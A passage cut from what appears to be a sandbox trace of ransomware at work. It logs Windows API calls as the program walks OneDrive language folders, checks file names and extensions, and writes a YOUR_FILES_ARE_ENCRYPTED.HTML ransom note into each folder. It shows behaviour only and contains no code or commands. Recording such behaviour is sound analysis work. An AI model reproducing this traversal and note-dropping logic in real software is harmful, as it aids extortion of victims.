(CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7472318, lpOverlapped=0x7472318) returned 1 [0160.039] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa639c2d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa658b4b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa658b4b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="az-latn-az", cAlternateFileName="AZ-LAT~1")) returned 1 [0160.039] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\az-latn-az") returned 82 [0160.039] GetProcessHeap () returned 0x270000 [0160.039] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.039] lstrcpyW (in: lpString1=0x74d2010, 
lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\az-latn-az" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\az-latn-az") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\az-latn-az" [0160.039] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\az-latn-az", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\az-latn-az\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\az-latn-az\\*" [0160.039] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\az-latn-az\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa639c2d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa658b4b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa658b4b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.040] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa639c2d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa658b4b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa658b4b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.040] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa658b4b0, 
ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa658b4b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa658b4b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.040] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\az-latn-az\\FileSync.LocalizedResources.dll.mui") returned 118 [0160.040] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.040] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.041] lstrlenW (lpString=".mui") returned 4 [0160.041] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.041] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa658b4b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa658b4b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa658b4b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.041] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.041] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\az-latn-az\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0160.041] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\az-latn-az\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\az-latn-az\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0160.041] WriteFile (in: hFile=0x5b0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.044] CloseHandle (hObject=0x5b0) returned 1 [0160.045] GetProcessHeap () returned 0x270000 [0160.046] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.046] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa658b4b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6754530, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6754530, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="be", cAlternateFileName="")) returned 1 [0160.046] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\be") returned 74 [0160.046] GetProcessHeap () returned 0x270000 [0160.046] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.046] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\be" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\be") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\be" [0160.047] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\be", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\be\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\be\\*" [0160.047] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\be\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa658b4b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6754530, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6754530, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.050] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa658b4b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6754530, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6754530, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.050] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6754530, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6754530, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6754530, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x124a8, 
dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.050] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\be\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.050] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.050] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.050] lstrlenW (lpString=".mui") returned 4 [0160.050] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.050] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6754530, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6754530, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6754530, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x124a8, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.050] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.051] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\be\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\be\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\be\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.255] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.258] CloseHandle (hObject=0x5a8) returned 1 [0160.258] GetProcessHeap () returned 0x270000 [0160.260] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.266] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6754530, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa691d5b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa691d5b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="bg", cAlternateFileName="")) returned 1 [0160.266] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bg") returned 74 [0160.266] GetProcessHeap () returned 0x270000 [0160.266] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.267] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bg" [0160.267] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bg", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bg\\*") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bg\\*" [0160.267] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bg\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6754530, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa691d5b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa691d5b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.268] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6754530, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa691d5b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa691d5b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.269] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa691d5b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa691d5b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa691d5b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ea8, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.269] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bg\\FileSync.LocalizedResources.dll.mui") 
returned 110 [0160.269] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.269] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.269] lstrlenW (lpString=".mui") returned 4 [0160.269] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.269] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa691d5b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa691d5b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa691d5b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ea8, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.269] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.270] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bg\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.270] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bg\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\bg\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.270] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.291] CloseHandle (hObject=0x5a8) returned 1 [0160.292] 
GetProcessHeap () returned 0x270000 [0160.293] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.293] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa691d5b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6ae6630, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6ae6630, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="bn-bd", cAlternateFileName="")) returned 1 [0160.293] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-bd") returned 77 [0160.293] GetProcessHeap () returned 0x270000 [0160.293] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.293] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-bd" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-bd") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-bd" [0160.293] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-bd", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-bd\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-bd\\*" [0160.293] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-bd\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa691d5b0, 
ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6ae6630, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6ae6630, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.294] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa691d5b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6ae6630, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6ae6630, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.294] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6ae6630, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6ae6630, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6ae6630, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12cb0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.294] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-bd\\FileSync.LocalizedResources.dll.mui") returned 113 [0160.294] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.295] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.295] lstrlenW (lpString=".mui") returned 4 [0160.295] PathFindExtensionW 
(pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.295] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6ae6630, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6ae6630, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6ae6630, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12cb0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.295] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.295] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-bd\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0160.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-bd\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\bn-bd\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.295] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.298] CloseHandle (hObject=0x5a8) returned 1 [0160.298] GetProcessHeap () returned 0x270000 [0160.299] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.299] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, 
ftCreationTime.dwLowDateTime=0xa6ae6630, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6c89550, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6c89550, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="bn-in", cAlternateFileName="")) returned 1 [0160.299] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-in") returned 77 [0160.299] GetProcessHeap () returned 0x270000 [0160.299] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.299] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-in" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-in") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-in" [0160.299] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-in", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-in\\*") 